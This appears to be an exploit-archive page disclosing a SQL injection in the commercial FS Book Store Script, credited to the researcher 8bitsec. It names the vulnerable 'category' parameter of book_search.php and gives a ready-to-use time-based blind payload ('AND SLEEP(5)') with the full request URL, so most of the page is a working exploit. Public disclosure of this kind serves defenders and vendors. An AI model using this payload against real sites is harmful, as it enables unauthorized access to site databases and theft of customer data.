Home / os / winmobile

FS Book Store Script SQL Injection

Posted on 25 October 2017

# Exploit Title: FS Book Store Script - SQL Injection # Date: 2017-10-23 # Exploit Author: 8bitsec # Vendor Homepage: https://fortunescripts.com/ # Software Link: https://fortunescripts.com/product/book-store-script/ # Version: 23 October 17 # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] # Email: contact@8bitsec.io # Contact: https://twitter.com/_8bitsec Release Date: ============= 2017-10-23 Product & Service Introduction: =============================== This is a robust platform for the booksellers and bookshop owners. Technical Details & Description: ================================ SQL injection on [category] parameter. Proof of Concept (PoC): ======================= SQLi: https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5) Parameter: category (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: book_name=xxxxx&category=4 AND SLEEP(5) ================== 8bitsec - [https://twitter.com/_8bitsec]

 

TOP

Malware :